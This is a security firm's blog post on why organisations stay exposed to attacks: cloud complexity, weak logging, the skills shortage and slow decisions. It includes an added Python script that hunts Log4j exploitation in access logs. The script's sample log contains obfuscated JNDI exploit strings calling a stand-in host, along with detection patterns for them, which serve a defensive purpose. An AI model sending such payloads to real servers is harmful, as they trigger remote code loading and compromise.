PERSPECTIVE 17 March 2022

Cybersecurity anno 2022: an inconvenient truth.

There is no question that, with everything that is going on in the world right now, cybersecurity is a topic on everyone’s mind. Whether it’s part of (digital) warfare or everyday business, the need to protect your environment and assets has never been more important.

The unfortunate and inconvenient truth is that, through our experience of running a Security Operations Center (SOC) for multiple customers, we witnessed a relatively steep increase in the number of attacks over the past two years, both targeted ones and those that are part of widespread campaigns. And with the increased number of attacks, we also saw a rise in the number of successful breaches.

Despite a common understanding of the importance of cybersecurity, too many organizations fail to adequately protect their environment and are, as a result, susceptible to a myriad of threats.

The reasons why this is still possible anno 2022 are not as surprising as you might think…

Complexity and speed of evolution 


For years, software vendors have praised the many benefits of ‘the cloud’, whereby most, if not all, of the cumbersome tasks related to maintaining apps and services are offloaded to the vendor or service provider. Rightfully so, customers have willingly accepted this new reality. Many, however, falsely assumed that a vendor’s efforts are sufficient to keep malicious actors away, and have failed to recognize and properly take care of their own responsibilities in the process. As such, these past couple of years have fostered an increasing attack surface which malicious actors are more than happy to exploit whenever possible.

A good example of this is Office 365. Microsoft takes care of securing its datacenters and the applications themselves (from a code perspective). Anything that happens within a customer’s environment, however, or through the integrations they build, is the customer’s responsibility: the accounts and identities, the devices, the data, and the configuration of the service.

The flexibility of many solutions means that plenty of custom integrations have been built, and they take many forms. Some applications are configured to leverage authentication capabilities from a cloud Identity Provider (like Azure AD); others access and exchange data between platforms and apps. Regardless of their purpose, these customizations and integrations typically create a complex IT landscape, akin to traditional on-premises environments, in which many servers, applications and (cloud) platforms are interconnected and rely on one another to function properly.

This increased complexity sometimes makes it hard to keep track of the dependencies, the configuration, and how both evolve, especially since cloud platforms and services tend to change much faster than traditional applications. New capabilities and functionalities need to be managed properly to ensure they do not have an adverse effect on the security posture of your environment, all the more so because app vendors do not always maintain security best practices themselves.

This is also one of the reasons why (Cloud) Security Posture Management (CSPM) solutions have become increasingly popular. Even though they help keep track of the configuration of one’s environment, few, if any, are able to cover the full landscape; most focus only on specific aspects of an environment, or on specific (major) vendor platforms. That, in turn, fuels another challenge: the lack of visibility.

Lack of visibility 


We often engage with customers that are taking their first steps towards a more structured approach to detecting and responding to security incidents. Those first steps are often accompanied by the sudden realization that there is little visibility into what is happening within their environment. All too often, basic logging policies or the retention of important security logs are missing, giving specific threats and vulnerabilities free rein by making their detection and remediation a lot harder, if not almost impossible.

A few recent examples that come to mind are the stream of vulnerabilities that Microsoft’s Exchange Server had to endure in 2021, and the more recent Log4j vulnerability. Through various engagements with new customers, we noticed that it was very hard to perform initial investigations and forensics, as lots of useful information was missing or had never been recorded in the first place. The result is that a lot of time is lost looking for clues that are well hidden in the dark corners of one’s environment.
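As an added illustration of the kind of investigation the Log4j paragraph above refers to, and not code from the original article or from The Collective: a small retro-hunt that scans web server access logs for the JNDI lookup strings used against Log4j (CVE-2021-44228), including the URL-encoded and nested-lookup variants that were used to evade naive pattern matching. The log lines are constructed for this example, and the function and field names are choices made here, not anything the article prescribes. The point it makes in practice is the one the paragraph makes: the scan can only find what was captured in the first place. If the User-Agent and Referer fields were never logged, or the files were rotated away before the vulnerability became public, there is nothing to hunt through.

```python
import re
import urllib.parse
from dataclasses import dataclass
from typing import List

# Constructed sample access log in combined format (not real customer data).
# Lines 2, 3 and 5 carry a JNDI lookup: plain, URL-encoded with ${lower:j},
# and built from ${::-x} default-value lookups respectively.
SAMPLE_LOG = """\
203.0.113.10 - - [11/Dec/2021:03:14:07 +0000] "GET /index.html HTTP/1.1" 200 1043 "-" "Mozilla/5.0"
203.0.113.11 - - [11/Dec/2021:03:14:09 +0000] "GET / HTTP/1.1" 200 1043 "-" "${jndi:ldap://198.51.100.5:1389/a}"
203.0.113.12 - - [11/Dec/2021:03:15:22 +0000] "GET /?x=%24%7B%24%7Blower%3Aj%7Dndi%3Armi%3A%2F%2F198.51.100.5%3A1099%2Fa%7D HTTP/1.1" 404 220 "-" "curl/7.68.0"
203.0.113.13 - - [11/Dec/2021:03:16:01 +0000] "POST /login HTTP/1.1" 302 0 "-" "Mozilla/5.0 (Windows NT 10.0)"
203.0.113.14 - - [11/Dec/2021:03:17:45 +0000] "GET /api HTTP/1.1" 200 50 "${${::-j}${::-n}${::-d}${::-i}:dns://198.51.100.5/x}" "Mozilla/5.0"
"""

# Nested lookups that Log4j evaluates before the outer ${jndi:...} is resolved.
# Collapsing them reproduces what the vulnerable logger would have seen.
LOOKUP_OBFUSCATIONS = [
    (re.compile(r"\$\{(?:lower|upper):([^{}])\}", re.I), r"\1"),  # ${lower:j} -> j
    (re.compile(r"\$\{[^{}]*?:-([^{}]*)\}"), r"\1"),              # ${::-j}, ${env:X:-j} -> j
]

# Protocols the JNDI lookup will happily dial out on; group 2 is the callback host[:port].
JNDI_RE = re.compile(r"\$\{jndi:(ldap|ldaps|rmi|dns|iiop|corba|nds|http)://([^/\s}]+)", re.I)


def normalise(text: str) -> str:
    """Undo URL encoding (attackers double-encode) and collapse nested lookups."""
    for _ in range(3):
        decoded = urllib.parse.unquote(text)
        if decoded == text:
            break
        text = decoded
    changed = True
    while changed:  # repeat until no nested lookup is left; each pass shrinks the text
        changed = False
        for pattern, repl in LOOKUP_OBFUSCATIONS:
            text, count = pattern.subn(repl, text)
            changed = changed or count > 0
    return text


@dataclass
class Hit:
    line_no: int
    client: str      # source IP from the first log field
    scheme: str      # ldap, rmi, dns, ...
    callback: str    # attacker-controlled host[:port], a pivot for further hunting
    raw: str


def scan(log_text: str) -> List[Hit]:
    """Return one Hit per log line that contains a (de-obfuscated) JNDI lookup."""
    hits = []
    for line_no, line in enumerate(log_text.splitlines(), 1):
        match = JNDI_RE.search(normalise(line))
        if match:
            client = line.split(" ", 1)[0]
            hits.append(Hit(line_no, client, match.group(1).lower(), match.group(2), line))
    return hits


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(f"line {hit.line_no}: {hit.client} -> {hit.scheme}://{hit.callback}")
```

The callback host and port are worth more than the hit itself: pivot on them in firewall, proxy and DNS logs (if those exist) to tell a blind scanner from an attempt that actually fetched a payload. The de-obfuscation rules above cover the common `${lower:}`, `${upper:}` and `${...:-x}` tricks but are not exhaustive; treat any `${` in a request header or path as suspicious rather than relying on the signature alone.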

Unfortunately, just enabling more logging won’t solve the majority of cybersecurity challenges. However, basic logging hygiene that ensures a minimum of events and activities is captured, and retained long enough to still be available when an investigation starts, can make the difference between quickly detecting that something is wrong and having to wait for the sudden impact of exfiltrated data or encrypted endpoints.

Lack of skills 


According to the 2021 ISC2 Cybersecurity Workforce Study, there is a staggering shortage of skilled cybersecurity professionals. ISC2 estimates the current workforce gap at about 2.72 million professionals, and that number is likely only to go up in the future. In practice this translates into long hiring cycles and organizations that simply don’t have the in-house knowledge or bandwidth to deal with all the activities required to maintain a healthy security posture.

Whereas hiring external expertise, such as what The Collective provides, can help overcome specific challenges, it is still important for organizations to have sufficient in-house knowledge to steer the security strategy and ensure proper follow-up of cybersecurity activities, whether they are carried out by internal or by external resources.

Lack of agility and decisiveness 


Perhaps the most striking reason why organizations have a hard time maintaining and improving their security posture is the inability to make important decisions within a reasonable time frame. When a new critical vulnerability hits the news, time is of the essence. There should be no place for corporate politics, long discussions and lengthy implementation periods. That doesn’t mean there is no room for controlled validation of changes, or that a process to streamline the necessary activities isn’t needed; it means the process must not become the bottleneck.

Malicious actors don’t keep a 9-to-5 mentality and certainly don’t care about your internal processes. You should assume that any opportunity to exploit a weakness in your defenses will be used. To keep up with the fast pace of an ever-changing landscape, organizations must be more agile in addressing specific and ongoing cybersecurity needs. When new vulnerabilities are discovered, patching shouldn’t take too long. Updating policies and other security configurations that reduce the attack surface of an environment should be a given, not an option.

To support this more agile approach to security, the necessary processes should be in place, and time and effort should be spent on ensuring that end users are properly assisted with changes that impact their experience or require them to respond to events as they unfold.

Time to reach out? 


At The Collective, we can help you overcome these challenges and regain control over your security posture. Want to know more about how we can help you secure your environment, increase visibility and respond to threats? Don’t hesitate to reach out.


Michael Van Horenbeeck

CEO

Focus

  • Cloud Security & Compliance
  • Identity Management
  • Messaging
